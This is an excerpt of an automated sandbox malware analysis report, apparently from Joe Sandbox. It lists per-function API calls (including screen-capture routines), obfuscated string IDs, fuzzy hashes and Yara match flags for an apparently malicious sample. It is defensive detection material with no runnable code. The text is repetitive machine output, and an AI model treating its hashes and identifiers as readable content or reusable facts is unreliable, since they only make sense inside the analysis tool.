• Instruction Fuzzy Hash: 9C620670689350AFE724CF18CC91B2FB7F2EFC9318F18862CE59597291D371A8458B96
APIs
• FreeLibrary.KERNEL32(?), ref: 00419CE7
• FreeLibrary.KERNEL32(?), ref: 00419D24
  • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00655ED0,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: ~|$8/d$SP$if$pv$tj$vt
• API String ID: 764372645-3249996398
• Opcode ID: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
• Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
• Opcode Fuzzy Hash: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
• Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 5&'d$8/d$O$~
• API String ID: 0-1531159568
• Opcode ID: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
• Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
• Opcode Fuzzy Hash: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
• Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 8/d$9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
• API String ID: 0-2187754830
• Opcode ID: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
• Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
• Opcode Fuzzy Hash: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
• Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                  • String ID: B"@$)RSP$=^"\$`J/H$rp
                                                                                                                                                                                                                                                  • API String ID: 237503144-816972838
                                                                                                                                                                                                                                                  • Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                                                                                                                                                                  • Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                                  • API String ID: 0-102253164
                                                                                                                                                                                                                                                  • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                                  • Instruction ID: 693336ea85fcc3691c05f262cd1c3ccf420b974d1f10f178631e414cfb0562ac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A33238B19402118BCB24CF28C8927B7B7B2FF95314F29829DD841AF794E775A902CBD1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                                  • API String ID: 0-102253164
                                                                                                                                                                                                                                                  • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                                  • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 02168B0B
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02168B15
                                                                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02168BBC
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 02168BD1
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 02168D1E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                  • String ID: 6W01
                                                                                                                                                                                                                                                  • API String ID: 4063528623-326071965
                                                                                                                                                                                                                                                  • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                                  • Instruction ID: ef920891a8683f2f8490b9df53ca0cfb4261b91120d842cf29670d5cd0b199fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9519C33A843040FD728AF64CC4936ABAD79BC1310F1FC1399985AB3E5EA74881687C5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: GetDC.USER32(00000000), ref: 02196BF0
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02196C11
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02196C21
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: DeleteObject.GDI32(00000000), ref: 02196C28
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: CreateCompatibleDC.GDI32(00000000), ref: 02196C37
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02196C42
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: SelectObject.GDI32(00000000,00000000), ref: 02196C4E
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02196C71
                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0216D7BC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                                  • String ID: &W-Q$9Y$?C*]$|qay$~wxH
                                                                                                                                                                                                                                                  • API String ID: 3248263802-1959178137
                                                                                                                                                                                                                                                  • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                                  • Instruction ID: d64a8785fb1b5922655d4daaca903a9dc154d7d82dc477e44cbbc13f831ae45d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76B115756447828BE725CF2AC4E0762BBE2FF96304B18C1ACC4D64FB4AD738A456CB51
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0040D555
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
• String ID: &W-Q$9Y$?C*]$|qay$~wxH
• API String ID: 3213364925-1959178137
• Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
• Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
• Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
• Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: )RSP$=^"\$B:$C@$K3$bX_^
• API String ID: 0-3030200349
• Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
• Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
• Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
• Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$8<j?$D$4b
• API String ID: 0-1320392364
• Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
• Instruction ID: 33c14b3dd8e556b6bb1c9d0d257617bd2fcc3fbb6d95f68222412c4c2d5ff5fb
• Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
• Instruction Fuzzy Hash: 6491F96124C3818BD718DF3988A137AFBD29FD6218F28896DF4D6CB291D339C506CB16
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 0$8<j?$D$4b
• API String ID: 0-1320392364
• Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
• Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
• Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
• Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 'P0V$,D,J$9HiN$WT
• API String ID: 0-3770969982
• Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
• Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
• Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
• Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: InitializeThunk
• String ID: 8/d$D`a&$NMNO$bX_^
• API String ID: 2994545307-4043978574
• Opcode ID: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
• Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
• Opcode Fuzzy Hash: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
• Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: 'P0V$,D,J$9HiN$WT
• API String ID: 0-3770969982
• Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
• Instruction ID: 302219231226957f85f38842a116535587710e3c441a26eac37571cbd7af3ecb
• Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
• Instruction Fuzzy Hash: CA71CFB654D3958BD704DF12C8802AFBBE2FBD1318F188E6CE5D85B251C739854A8F86
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: B:$C@$K3$bX_^
• API String ID: 0-595269213
• Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
• Instruction ID: ac98e73513190f87351c477225c74d1024ae1257b834f24e2f2e77a0827e6994
• Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
• Instruction Fuzzy Hash: FA41CEB5D102289FDB20EF79CD867DDBFB1AB85300F4442AAE448A7295D7340E498FD2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 8/d$NP,?$UA
• API String ID: 0-3133226710
• Opcode ID: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
• Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d${wBy$?;;
                                                                                                                                                                                                                                                  • API String ID: 0-326893911
                                                                                                                                                                                                                                                  • Opcode ID: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
                                                                                                                                                                                                                                                  • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                                  • Instruction ID: ad3e51909986bf19d225fabcaab568f0f3a06181d2ac75e0ae1fb3a6de933e4f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2181E96124C3818BD719DF3984A137AFFD29FD6218F28896DF4D68B281D379C50ACB16
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                                  • Instruction ID: 2b0d814e4e8c54bf832904666e15b804ece722a813b0ffe0c3904ebe2707db2f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C881F96124C3818BD719DF3988A137AFFD29FD6218F28896DF4D68B281D379C506CB16
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                                  • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                                  • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: #=0$Z$ut
                                                                                                                                                                                                                                                  • API String ID: 0-1971374411
                                                                                                                                                                                                                                                  • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                                  • Instruction ID: 7a96372b25fad4524b519f99eba8cb80494cba8d57eef7dbc56d6cf47418a384
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC81133120C3828BD7098F38C55477AFFE1AF93218F1899ADD4D29B682D739C51AC752
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: #=0$Z$ut
• API String ID: 0-1971374411
• Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
• Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
• Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
• Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: 8<j?$D$4b
• API String ID: 0-2390459867
• Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
• Instruction ID: fb46cda96982c19aa9ca075b4272b4b53cfbbef8bb0f81e0a7c936c421a97a90
